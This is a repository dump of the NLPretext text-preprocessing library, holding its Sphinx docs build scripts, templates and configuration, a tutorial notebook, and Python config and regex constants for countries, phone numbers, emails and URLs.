	echo.Build finished; the LaTeX files are in %BUILDDIR%/latex.
	goto end
)

if "%1" == "text" (
	%SPHINXBUILD% -b text %ALLSPHINXOPTS% %BUILDDIR%/text
	echo.
	echo.Build finished. The text files are in %BUILDDIR%/text.
	goto end
)

if "%1" == "man" (
	%SPHINXBUILD% -b man %ALLSPHINXOPTS% %BUILDDIR%/man
	echo.
	echo.Build finished. The manual pages are in %BUILDDIR%/man.
	goto end
)

if "%1" == "changes" (
	%SPHINXBUILD% -b changes %ALLSPHINXOPTS% %BUILDDIR%/changes
	echo.
	echo.The overview file is in %BUILDDIR%/changes.
	goto end
)

if "%1" == "linkcheck" (
	%SPHINXBUILD% -b linkcheck %ALLSPHINXOPTS% %BUILDDIR%/linkcheck
	echo.
	echo.Link check complete; look for any errors in the above output ^
or in %BUILDDIR%/linkcheck/output.txt.
	goto end
)

if "%1" == "doctest" (
	%SPHINXBUILD% -b doctest %ALLSPHINXOPTS% %BUILDDIR%/doctest
	echo.
	echo.Testing of doctests in the sources finished, look at the ^
results in %BUILDDIR%/doctest/output.txt.
	goto end
)

:end


================================================
FILE: docs/scripts/buildsite.sh
================================================
#!/bin/bash

export SOURCE_DATE_EPOCH=$(git log -1 --pretty=%ct)

##############
# BUILD DOCS #
##############

# Python Sphinx, configured with source/conf.py
# See https://www.sphinx-doc.org/

cd docs/

current_tag=$(git symbolic-ref -q --short HEAD || git describe --tags --exact-match)
current_tag_message=$(git cat-file -p $(git rev-parse $(git tag -l | tail -n1)) | tail -n +6)

make clean
make apidoc
git add .
git commit -m "Commit needed for multiversioning"

git pull --tags
git tag -a latest -m "Latest version of the package"

make multiversion

#######################
# Update GitHub Pages #
#######################

docroot=`mktemp -d`
cp -r build/html/* ${docroot}

cd ..

git branch -d gh-pages
git checkout --orphan gh-pages
git rm --cached -r .
git clean -fdx

# Adds .nojekyll file to the root to signal to GitHub that
# directories that start with an underscore (_) can remain
touch .nojekyll

# Add index.html
cat > index.html <<EOF
<!DOCTYPE html>
<html>
  <head>
    <title>Redirecting to the latest release</title>
    <meta charset="utf-8">
    <meta http-equiv="refresh" content="0; url=./latest/index.html">
    <link rel="canonical" href="./latest/index.html">
  </head>
</html>
EOF

# Add README
cat > README.md <<EOF
# README for the GitHub Pages Branch
This branch is simply a cache for the website and is not intended to be viewed on github.com.
EOF

# Copy the resulting html pages built from Sphinx to the gh-pages branch
cp -r ${docroot}/* .

git add .

# Make a commit with changes and any new files
msg="Updating Docs for commit ${GITHUB_SHA} made on `date -d"@${SOURCE_DATE_EPOCH}" --iso-8601=seconds` from ${GITHUB_REF} by ${GITHUB_ACTOR}"
git commit -m "${msg}"

# overwrite the contents of the gh-pages branch on our github.com repo
git push origin gh-pages --force

# exit cleanly
exit 0


================================================
FILE: docs/source/_templates/module.rst_t
================================================

{%- if show_headings %}
{{- [basename] | join(' ') | e | heading }}

{% endif -%}
.. automodule:: {{ qualname }}
{%- for option in automodule_options %}
   :{{ option }}:
{%- endfor %}


================================================
FILE: docs/source/_templates/package.rst_t
================================================

{%- macro automodule(modname, options) -%}
.. automodule:: {{ modname }}
{%- for option in options %}
   :{{ option }}:
{%- endfor %}
{%- endmacro %}

{%- macro toctree(docnames) -%}
.. toctree::
   :maxdepth: {{ maxdepth }}
{% for docname in docnames %}
   {{ docname }}
{%- endfor %}
{%- endmacro %}

{%- if is_namespace %}
{{- ["**", pkgname, "**"] | join("") | heading }}
{% else %}
{% set pkg_list = pkgname.split('.') %}
{{- ["**", pkg_list[-1], "**"] | join("") | heading }}
{% endif %}

{%- if modulefirst and not is_namespace %}
{{ automodule(pkgname, automodule_options) }}
{% endif %}

{%- if subpackages %}

{{ toctree(subpackages) }}
{% endif %}

{%- if submodules %}
{% if separatemodules %}
{{ toctree(submodules) }}
{% else %}
{%- for submodule in submodules %}
{% if show_headings %}
{% set submodule_list = submodule.split('.') %}
{{- [submodule_list[-1]] | join(" ") | e | heading(2) }}
{% endif %}
{{ automodule(submodule, automodule_options) }}
{% endfor %}
{%- endif %}
{%- endif %}

{%- if not modulefirst and not is_namespace %}

{{ automodule(pkgname, automodule_options) }}
{% endif %}


================================================
FILE: docs/source/_templates/versions.html
================================================

{%- if current_version %}
<div class="rst-versions" data-toggle="rst-versions" role="note" aria-label="versions">
  <span class="rst-current-version" data-toggle="rst-current-version">
    <span class="fa fa-book"> Other Versions</span>
    v: {{ current_version.name }}
    <span class="fa fa-caret-down"></span>
  </span>
  <div class="rst-other-versions">
    {%- if versions.tags %}
    <dl>
      <dt>Tags</dt>
      {%- for item in versions.tags %}
      <dd><a href="{{ item.url }}">{{ item.name }}</a></dd>
      {%- endfor %}
    </dl>
    {%- endif %}
    {%- if versions.branches %}
    <dl>
      <dt>Branches</dt>
      {%- for item in versions.branches %}
      <dd><a href="{{ item.url }}">{{ item.name }}</a></dd>
      {%- endfor %}
    </dl>
    {%- endif %}
  </div>
</div>
{%- endif %}


================================================
FILE: docs/source/conf.py
================================================
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html

# -- Path setup --------------------------------------------------------------

# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys

sys.path.insert(0, os.path.abspath(".."))


# -- Project information -----------------------------------------------------

project = "nlpretext"
author = "artefactory"

# -- General configuration ---------------------------------------------------

# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
    "sphinx.ext.autodoc",
    "sphinx.ext.autosummary",
    "sphinx.ext.intersphinx",
    "sphinx.ext.mathjax",
    "sphinx.ext.napoleon",
    "sphinx.ext.todo",
    "sphinx.ext.viewcode",
    "recommonmark",
    "nbsphinx",
    "sphinx_multiversion",
    "sphinx_autodoc_typehints",
    "sphinx_rtd_theme",
]

source_suffix = {
    ".rst": "restructuredtext",
    ".txt": "restructuredtext",
    ".md": "markdown",
}

source_parsers = {".md": "recommonmark.parser.CommonMarkParser"}

nbsphinx_execute = "never"

github_url = "https://github.com/artefactory/NLPretext"

smv_prefer_remote_refs = False
smv_remote_whitelist = None
smv_prebuild_command = (
    "poetry run sphinx-apidoc -f -o source/apidoc/ "
    "../nlpretext/ "
    "--implicit-namespaces -M -t source/_templates"
)

# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]

# Autodoc parameters
always_document_param_types = True
add_module_names = False
autodoc_member_order = "bysource"

# -- Options for HTML output -------------------------------------------------

# The theme to use for HTML and HTML Help pages.  See the documentation for
# a list of builtin themes.

html_theme = "sphinx_rtd_theme"

github_url = "https://www.github.com/artefactory/NLPretext}"


# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]

# -- Options for LaTeX output ------------------------------------------------

latex_elements = {
    # Font packages
    "fontpkg": "\\usepackage{amsmath, amsfonts, amssymb, amsthm}"
}


================================================
FILE: docs/source/index.rst
================================================
=========
NLPretext
=========


Welcome to NLPretext's documentation!
========================================

The NLPretext library aimed to be a meta-library to be used to help you get started on handling your NLP use-case preprocessing.


# Installation

Beware, this package has been tested on Python `3.8`, `3.9` & `3.10` and will probably not be working under python **2.7** as **Python2.7** EOL is scheduled for December 2019.

To install this library you should first clone the repository:

pip install nlpretext


.. toctree::
    :maxdepth: 4
    :caption: Tutorials:

    ./tutorials/index

.. toctree::
    :maxdepth: 2
    :caption: API Reference:

    ./apidoc/modules

Indices and tables
==================

* :ref:`genindex`
* :ref:`modindex`
* :ref:`search`


================================================
FILE: docs/source/tutorials/basic_notebook.ipynb
================================================
{
 "cells": [
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "# How to use the package in a notebook\n",
    "\n",
    "<div align=\"center\">\n",
    "\n",
    "<div style=\"width: 25%; min-width: 150px; padding: 20px\">\n",
    "\n",
    "![Python Logo](../_static/images/python_logo.png)\n",
    "\n",
    "</div>\n",
    "\n",
    "### *nlpretext*\n",
    "\n",
    "</div>\n",
    "\n",
    "## Installing from the main branch\n",
    "\n",
    "To install the library from the main branch, you can run the following cell :"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {
    "pycharm": {
     "name": "#%%\n"
    }
   },
   "outputs": [],
   "source": [
    "%pip install git+ssh://git@github.com/artefactory/NLPretext.git@main"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Installing from a specific release\n",
    "\n",
    "To install the library from a specific release, you can run the following cell :"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {
    "pycharm": {
     "name": "#%%\n"
    }
   },
   "outputs": [],
   "source": [
    "%pip install git+ssh://git@github.com/artefactory/NLPretext.git@v1.0.5"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Using the package\n",
    "\n",
    "You can now import and run whatever is in the package :"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {
    "pycharm": {
     "name": "#%%\n"
    }
   },
   "outputs": [],
   "source": [
    "from nlpretext.basic.preprocess import replace_emails\n",
    "\n",
    "example = \"I have forwarded this email to obama@whitehouse.gov\"\n",
    "example = replace_emails(example, replace_with=\"*EMAIL*\")"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {
    "pycharm": {
     "name": "#%%\n"
    }
   },
   "outputs": [],
   "source": [
    "print(example)"
   ]
  }
 ],
 "metadata": {
  "kernelspec": {
   "display_name": "Python 3",
   "language": "python",
   "name": "python3"
  },
  "language_info": {
   "codemirror_mode": {
    "name": "ipython",
    "version": 3
   },
   "file_extension": ".py",
   "mimetype": "text/x-python",
   "name": "python",
   "nbconvert_exporter": "python",
   "pygments_lexer": "ipython3",
   "version": "3.7.9"
  }
 },
 "nbformat": 4,
 "nbformat_minor": 1
}


================================================
FILE: docs/source/tutorials/index.rst
================================================
Tutorials
=========


.. toctree::
    :maxdepth: 4
    :glob:

    basic_notebook


================================================
FILE: nlpretext/__init__.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.

# mypy: disable-error-code="attr-defined"
# mypy: disable-error-code="assignment"

"""All the goto functions you need to handle NLP use-cases, integrated in NLPretext."""

from importlib.metadata import PackageNotFoundError, version

from nlpretext.preprocessor import Preprocessor

try:
    __version__ = version(__name__)
except PackageNotFoundError:  # pragma: no cover
    __version__ = "unknown"


__all__ = ["Preprocessor"]


================================================
FILE: nlpretext/_config/__init__.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.


================================================
FILE: nlpretext/_config/config.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#!/usr/local/bin/python3
from typing import List, Optional

import os

import phonenumbers as _phonenumbers

ROOT_FOLDER = os.path.abspath(os.path.join(os.path.dirname(__file__), "../.."))

# Country config
COUNTRY_MAPPING_ISO = {
    "af": "Afghanistan",
    "ax": "Åland Islands",
    "al": "Albania",
    "dz": "Algeria",
    "as": "American Samoa",
    "ad": "Andorra",
    "ao": "Angola",
    "ai": "Anguilla",
    "aq": "Antarctica",
    "ag": "Antigua and Barbuda",
    "ar": "Argentina",
    "am": "Armenia",
    "aw": "Aruba",
    "au": "Australia",
    "at": "Austria",
    "az": "Azerbaijan",
    "bs": "Bahamas",
    "bh": "Bahrain",
    "bd": "Bangladesh",
    "bb": "Barbados",
    "by": "Belarus",
    "be": "Belgium",
    "bz": "Belize",
    "bj": "Benin",
    "bm": "Bermuda",
    "bt": "Bhutan",
    "bo": "Bolivia (Plurinational State of)",
    "bq": "Bonaire, Sint Eustatius and Saba",
    "ba": "Bosnia and Herzegovina",
    "bw": "Botswana",
    "bv": "Bouvet Island",
    "br": "Brazil",
    "io": "British Indian Ocean Territory",
    "bn": "Brunei Darussalam",
    "bg": "Bulgaria",
    "bf": "Burkina Faso",
    "bi": "Burundi",
    "cv": "Cabo Verde",
    "kh": "Cambodia",
    "cm": "Cameroon",
    "ca": "Canada",
    "ky": "Cayman Islands",
    "cf": "Central African Republic",
    "td": "Chad",
    "cl": "Chile",
    "cn": "China",
    "cx": "Christmas Island",
    "cc": "Cocos (Keeling) Islands",
    "co": "Colombia",
    "km": "Comoros",
    "cg": "Congo",
    "cd": "Congo, Democratic Republic of the",
    "ck": "Cook Islands",
    "cr": "Costa Rica",
    "ci": "Côte d'Ivoire",
    "hr": "Croatia",
    "cu": "Cuba",
    "cw": "Curaçao",
    "cy": "Cyprus",
    "cz": "Czechia",
    "dk": "Denmark",
    "dj": "Djibouti",
    "dm": "Dominica",
    "do": "Dominican Republic",
    "ec": "Ecuador",
    "eg": "Egypt",
    "sv": "El Salvador",
    "gq": "Equatorial Guinea",
    "er": "Eritrea",
    "ee": "Estonia",
    "sz": "Eswatini",
    "et": "Ethiopia",
    "fk": "Falkland Islands (Malvinas)",
    "fo": "Faroe Islands",
    "fj": "Fiji",
    "fi": "Finland",
    "fr": "France",
    "gf": "French Guiana",
    "pf": "French Polynesia",
    "tf": "French Southern Territories",
    "ga": "Gabon",
    "gm": "Gambia",
    "ge": "Georgia",
    "de": "Germany",
    "gh": "Ghana",
    "gi": "Gibraltar",
    "gr": "Greece",
    "gl": "Greenland",
    "gd": "Grenada",
    "gp": "Guadeloupe",
    "gu": "Guam",
    "gt": "Guatemala",
    "gg": "Guernsey",
    "gn": "Guinea",
    "gw": "Guinea-Bissau",
    "gy": "Guyana",
    "ht": "Haiti",
    "hm": "Heard Island and McDonald Islands",
    "va": "Holy See",
    "hn": "Honduras",
    "hk": "Hong Kong",
    "hu": "Hungary",
    "is": "Iceland",
    "in": "India",
    "id": "Indonesia",
    "ir": "Iran (Islamic Republic of)",
    "iq": "Iraq",
    "ie": "Ireland",
    "im": "Isle of Man",
    "il": "Israel",
    "it": "Italy",
    "jm": "Jamaica",
    "jp": "Japan",
    "je": "Jersey",
    "jo": "Jordan",
    "kz": "Kazakhstan",
    "ke": "Kenya",
    "ki": "Kiribati",
    "kp": "Korea (Democratic People's Republic of)",
    "kr": "Korea, Republic of",
    "kw": "Kuwait",
    "kg": "Kyrgyzstan",
    "la": "Lao People's Democratic Republic",
    "lv": "Latvia",
    "lb": "Lebanon",
    "ls": "Lesotho",
    "lr": "Liberia",
    "ly": "Libya",
    "li": "Liechtenstein",
    "lt": "Lithuania",
    "lu": "Luxembourg",
    "mo": "Macao",
    "mg": "Madagascar",
    "mw": "Malawi",
    "my": "Malaysia",
    "mv": "Maldives",
    "ml": "Mali",
    "mt": "Malta",
    "mh": "Marshall Islands",
    "mq": "Martinique",
    "mr": "Mauritania",
    "mu": "Mauritius",
    "yt": "Mayotte",
    "mx": "Mexico",
    "fm": "Micronesia (Federated States of)",
    "md": "Moldova, Republic of",
    "mc": "Monaco",
    "mn": "Mongolia",
    "me": "Montenegro",
    "ms": "Montserrat",
    "ma": "Morocco",
    "mz": "Mozambique",
    "mm": "Myanmar",
    "na": "Namibia",
    "nr": "Nauru",
    "np": "Nepal",
    "nl": "Netherlands",
    "nc": "New Caledonia",
    "nz": "New Zealand",
    "ni": "Nicaragua",
    "ne": "Niger",
    "ng": "Nigeria",
    "nu": "Niue",
    "nf": "Norfolk Island",
    "mk": "North Macedonia",
    "mp": "Northern Mariana Islands",
    "no": "Norway",
    "om": "Oman",
    "pk": "Pakistan",
    "pw": "Palau",
    "ps": "Palestine, State of",
    "pa": "Panama",
    "pg": "Papua New Guinea",
    "py": "Paraguay",
    "pe": "Peru",
    "ph": "Philippines",
    "pn": "Pitcairn",
    "pl": "Poland",
    "pt": "Portugal",
    "pr": "Puerto Rico",
    "qa": "Qatar",
    "re": "Réunion",
    "ro": "Romania",
    "ru": "Russian Federation",
    "rw": "Rwanda",
    "bl": "Saint Barthélemy",
    "sh": "Saint Helena, Ascension and Tristan da Cunha",
    "kn": "Saint Kitts and Nevis",
    "lc": "Saint Lucia",
    "mf": "Saint Martin (French part)",
    "pm": "Saint Pierre and Miquelon",
    "vc": "Saint Vincent and the Grenadines",
    "ws": "Samoa",
    "sm": "San Marino",
    "st": "Sao Tome and Principe",
    "sa": "Saudi Arabia",
    "sn": "Senegal",
    "rs": "Serbia",
    "sc": "Seychelles",
    "sl": "Sierra Leone",
    "sg": "Singapore",
    "sx": "Sint Maarten (Dutch part)",
    "sk": "Slovakia",
    "si": "Slovenia",
    "sb": "Solomon Islands",
    "so": "Somalia",
    "za": "South Africa",
    "gs": "South Georgia and the South Sandwich Islands",
    "ss": "South Sudan",
    "es": "Spain",
    "lk": "Sri Lanka",
    "sd": "Sudan",
    "sr": "Suriname",
    "sj": "Svalbard and Jan Mayen",
    "se": "Sweden",
    "ch": "Switzerland",
    "sy": "Syrian Arab Republic",
    "tw": "Taiwan, Province of China",
    "tj": "Tajikistan",
    "tz": "Tanzania, United Republic of",
    "th": "Thailand",
    "tl": "Timor-Leste",
    "tg": "Togo",
    "tk": "Tokelau",
    "to": "Tonga",
    "tt": "Trinidad and Tobago",
    "tn": "Tunisia",
    "tr": "Turkey",
    "tm": "Turkmenistan",
    "tc": "Turks and Caicos Islands",
    "tv": "Tuvalu",
    "ug": "Uganda",
    "ua": "Ukraine",
    "ae": "United Arab Emirates",
    "gb": "United Kingdom of Great Britain and Northern Ireland",
    "us": "United States of America",
    "um": "United States Minor Outlying Islands",
    "uy": "Uruguay",
    "uz": "Uzbekistan",
    "vu": "Vanuatu",
    "ve": "Venezuela (Bolivarian Republic of)",
    "vn": "Viet Nam",
    "vg": "Virgin Islands (British)",
    "vi": "Virgin Islands (U.S.)",
    "wf": "Wallis and Futuna",
    "eh": "Western Sahara",
    "ye": "Yemen",
    "zm": "Zambia",
    "zw": "Zimbabwe",
}

# Phone numbers config
SUPPORTED_COUNTRY: List[Optional[str]] = [
    None,
    "US",
    "AG",
    "AI",
    "AS",
    "BB",
    "BM",
    "BS",
    "CA",
    "DM",
    "GD",
    "GU",
    "JM",
    "KN",
    "KY",
    "LC",
    "MP",
    "MS",
    "PR",
    "SX",
    "TC",
    "TT",
    "VC",
    "VG",
    "VI",
    "RU",
    "KZ",
    "EG",
    "ZA",
    "GR",
    "NL",
    "BE",
    "FR",
    "ES",
    "HU",
    "IT",
    "VA",
    "RO",
    "CH",
    "AT",
    "GB",
    "GG",
    "IM",
    "JE",
    "DK",
    "SE",
    "NO",
    "SJ",
    "PL",
    "DE",
    "PE",
    "MX",
    "CU",
    "AR",
    "BR",
    "CL",
    "CO",
    "VE",
    "MY",
    "AU",
    "CC",
    "CX",
    "ID",
    "PH",
    "NZ",
    "SG",
    "TH",
    "JP",
    "KR",
    "VN",
    "CN",
    "TR",
    "IN",
    "PK",
    "AF",
    "LK",
    "MM",
    "IR",
    "SS",
    "MA",
    "EH",
    "DZ",
    "TN",
    "LY",
    "GM",
    "SN",
    "MR",
    "ML",
    "GN",
    "CI",
    "BF",
    "NE",
    "TG",
    "BJ",
    "MU",
    "LR",
    "SL",
    "GH",
    "NG",
    "TD",
    "CF",
    "CM",
    "CV",
    "ST",
    "GQ",
    "GA",
    "CG",
    "CD",
    "AO",
    "GW",
    "IO",
    "AC",
    "SC",
    "SD",
    "RW",
    "ET",
    "SO",
    "DJ",
    "KE",
    "TZ",
    "UG",
    "BI",
    "MZ",
    "ZM",
    "MG",
    "RE",
    "YT",
    "ZW",
    "NA",
    "MW",
    "LS",
    "BW",
    "SZ",
    "KM",
    "SH",
    "TA",
    "ER",
    "AW",
    "FO",
    "GL",
    "GI",
    "PT",
    "LU",
    "IE",
    "IS",
    "AL",
    "MT",
    "CY",
    "FI",
    "AX",
    "BG",
    "LT",
    "LV",
    "EE",
    "MD",
    "AM",
    "BY",
    "AD",
    "MC",
    "SM",
    "UA",
    "RS",
    "ME",
    "XK",
    "HR",
    "SI",
    "BA",
    "MK",
    "CZ",
    "SK",
    "LI",
    "FK",
    "BZ",
    "GT",
    "SV",
    "HN",
    "NI",
    "CR",
    "PA",
    "PM",
    "HT",
    "GP",
    "BL",
    "MF",
    "BO",
    "GY",
    "EC",
    "GF",
    "PY",
    "MQ",
    "SR",
    "UY",
    "CW",
    "BQ",
    "TL",
    "NF",
    "BN",
    "NR",
    "PG",
    "TO",
    "SB",
    "VU",
    "FJ",
    "PW",
    "WF",
    "CK",
    "NU",
    "WS",
    "KI",
    "NC",
    "TV",
    "PF",
    "TK",
    "FM",
    "MH",
    "KP",
    "HK",
    "MO",
    "KH",
    "LA",
    "BD",
    "TW",
    "MV",
    "LB",
    "JO",
    "SY",
    "IQ",
    "KW",
    "SA",
    "YE",
    "OM",
    "PS",
    "AE",
    "IL",
    "BH",
    "QA",
    "BT",
    "MN",
    "NP",
    "TJ",
    "TM",
    "AZ",
    "GE",
    "KG",
    "UZ",
    "DO",
]

FORMAT_NUMBERS = {
    "E164": _phonenumbers.PhoneNumberFormat.E164,
    "INTERNATIONAL": _phonenumbers.PhoneNumberFormat.INTERNATIONAL,
    "NATIONAL": _phonenumbers.PhoneNumberFormat.NATIONAL,
    "RFC3966": _phonenumbers.PhoneNumberFormat.RFC3966,
}


================================================
FILE: nlpretext/_config/constants.py
================================================
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
# mypy: disable-error-code="attr-defined"

"""
Collection of regular expressions and other (small, generally useful) constants.
Credits to textacy for some of them: https://github.com/chartbeat-labs/textacy.
"""
import re
import sys
import unicodedata

import regex

NUMERIC_NE_TYPES = {
    "ORDINAL",
    "CARDINAL",
    "MONEY",
    "QUANTITY",
    "PERCENT",
    "TIME",
    "DATE",
}
SUBJ_DEPS = {"agent", "csubj", "csubjpass", "expl", "nsubj", "nsubjpass"}
OBJ_DEPS = {"attr", "dobj", "dative", "oprd"}
AUX_DEPS = {"aux", "auxpass", "neg"}

REPORTING_VERBS = {
    "according",
    "accuse",
    "acknowledge",
    "add",
    "admit",
    "agree",
    "allege",
    "announce",
    "argue",
    "ask",
    "assert",
    "believe",
    "blame",
    "charge",
    "cite",
    "claim",
    "complain",
    "concede",
    "conclude",
    "confirm",
    "contend",
    "criticize",
    "declare",
    "decline",
    "deny",
    "describe",
    "disagree",
    "disclose",
    "estimate",
    "explain",
    "fear",
    "hope",
    "insist",
    "maintain",
    "mention",
    "note",
    "observe",
    "order",
    "predict",
    "promise",
    "recall",
    "recommend",
    "reply",
    "report",
    "say",
    "state",
    "stress",
    "suggest",
    "tell",
    "testify",
    "think",
    "urge",
    "warn",
    "worry",
    "write",
}

CURRENCIES = {
    "$": "USD",
    "zł": "PLN",
    "£": "GBP",
    "¥": "JPY",
    "฿": "THB",
    "₡": "CRC",
    "₦": "NGN",
    "₩": "KRW",
    "₪": "ILS",
    "₫": "VND",
    "€": "EUR",
    "₱": "PHP",
    "₲": "PYG",
    "₴": "UAH",
    "₹": "INR",
}

POS_REGEX_PATTERNS = {
    "en": {
        "NP": r"<DET>? <NUM>* (<ADJ> <PUNCT>? <CONJ>?)* (<NOUN>|<PROPN> <PART>?)+",
        "PP": r"<ADP> <DET>? <NUM>* (<ADJ> <PUNCT>? <CONJ>?)* (<NOUN> <PART>?)+",
        "VP": r"<AUX>* <ADV>* <VERB>",
    }
}

PUNCT_TRANSLATE_UNICODE = dict.fromkeys(
    (i for i in range(sys.maxunicode) if unicodedata.category(chr(i)).startswith("P")),
    " ",
)


ACRONYM_REGEX = re.compile(
    r"(?:^|(?<=\W))(?:(?:(?:(?:[A-Z]\.?)+[a-z0-9&/-]?)+(?:[A-Z][s.]?|[0-9]s?))|(?:[0-9](?:\-?[A-Z])+))(?:$|(?=\W))",
    flags=re.UNICODE,
)
EMAIL_REGEX = re.compile(
    r"(?:^|(?<=[^\w@.)]))([\w+-](\.(?!\.))?)*?[\w+-]@(?:\w-?)*?\w+(\.([a-z]{2,})){1,3}(?:$|(?=\b))",
    flags=re.IGNORECASE | re.UNICODE,
)
PHONE_REGEX = re.compile(
    r"(?:^|(?<=[^\w)]))(\+?1[ .-]?)?(\(?\d{3}\)?[ .-]?)?(\d{3}[ .-]?\d{4})(\s?(?:ext\.?|[#x-])\s?\d{2,6})?(?:$|(?=\W))"  # noqa: E501
)
NUMBERS_REGEX = re.compile(
    r"(?:^|(?<=[^\w,.]))[+–-]?(([1-9]\d{0,2}(,\d{3})+(\.\d*)?)|([1-9]\d{0,2}([ .]\d{3})+(,\d*)?)|"
    r"(\d*?[.,]\d+)|\d+)(?:|(?=\b))"
)
CURRENCY_REGEX = re.compile("({})+".format("|".join(re.escape(c) for c in CURRENCIES)))
LINEBREAK_REGEX = re.compile(r"((\r\n)|[\n\v])+")
NONBREAKING_SPACE_REGEX = re.compile(r"(?!\n)\s+")
URL_REGEX = re.compile(
    r"(?:|(?<![\w/.]))"
    # protocol identifier
    # r"(?:(?:https?|ftp)://)"  <-- alt?
    r"(?:(?:https?://|mailto:|ftp://|www\d{0,3}\.))"
    # user:pass authentication
    r"(?:\S+(?::\S*)?@)?" r"(?:"
    # IP address exclusion
    # private & local networks
    r"(?!(?:10|127)(?:\.\d{1,3}){3})"
    r"(?!(?:169\.254|192\.168)(?:\.\d{1,3}){2})"
    r"(?!172\.(?:1[6-9]|2\d|3[0-1])(?:\.\d{1,3}){2})"
    # IP address dotted notation octets
    # excludes loopback network 0.0.0.0
    # excludes reserved space >= 224.0.0.0
    # excludes network & broadcast addresses
    # (first & last IP address of each class)
    r"(?:[1-9]\d?|1\d\d|2[01]\d|22[0-3])"
    r"(?:\.(?:1?\d{1,2}|2[0-4]\d|25[0-5])){2}"
    r"(?:\.(?:[1-9]\d?|1\d\d|2[0-4]\d|25[0-4]))"
    r"|"
    # host name
    r"(?:(?:[a-z\u00a1-\uffff0-9]-?)*[a-z\u00a1-\uffff0-9]+)"
    # domain name
    r"(?:\.(?:[a-z\u00a1-\uffff0-9]-?)*[a-z\u00a1-\uffff0-9]+)*"
    # TLD identifier
    r"(?:\.(?:[a-z\u00a1-\uffff]{2,}))" r")"
    # port number
    r"(?::\d{2,5})?"
    # resource path
    r"(?:/\S*)?" r"(?:$|(?![\w?!+&/]))",
    flags=re.UNICODE | re.IGNORECASE,
)  # source: https://gist.github.com/dperini/729294
SHORT_URL_REGEX = re.compile(
    r"(?:^|(?<![\w/.]))"
    # optional scheme
    r"(?:(?:https?://)?)"
    # domain
    r"(?:\w-?)*?\w+(?:\.[a-z]{2,12}){1,3}" r"/"
    # hash
    r"[^\s.,?!'\"|+]{2,12}" r"(?:$|(?![\w?!+&/]))",
    flags=re.IGNORECASE,
)

# regexes for cleaning up crufty terms
DANGLING_PARENS_TERM_RE = re.compile(
    r"(?:\s|^)(\()\s{1,2}(.*?)\s{1,2}(\))(?:\s|$)", flags=re.UNICODE
)
LEAD_TAIL_CRUFT_TERM_RE = re.compile(r"^([^\w(-] ?)+|([^\w).!?] ?)+$", flags=re.UNICODE)
LEAD_HYPHEN_TERM_RE = re.compile(r"^-([^\W\d_])", flags=re.UNICODE)
NEG_DIGIT_TERM_RE = re.compile(r"(-) (\d)", flags=re.UNICODE)
WEIRD_HYPHEN_SPACE_TERM_RE = re.compile(r"(?<=[^\W\d]) (-[^\W\d])", flags=re.UNICODE)
WEIRD_APOSTR_SPACE_TERM_RE = re.compile(r"([^\W\d]+) ('[a-z]{1,2}\b)", flags=re.UNICODE)
LATIN_CHARACTERS_RE = regex.compile(r"[^\p{Latin}1-9]")

# ENGLISH CONTRACTIONS
CONTRACTION_NT_NOT = re.compile(
    r"(\b)(are|could|did|does|do|had|has|have|is|might|must|should|were|would)n't", re.IGNORECASE
)
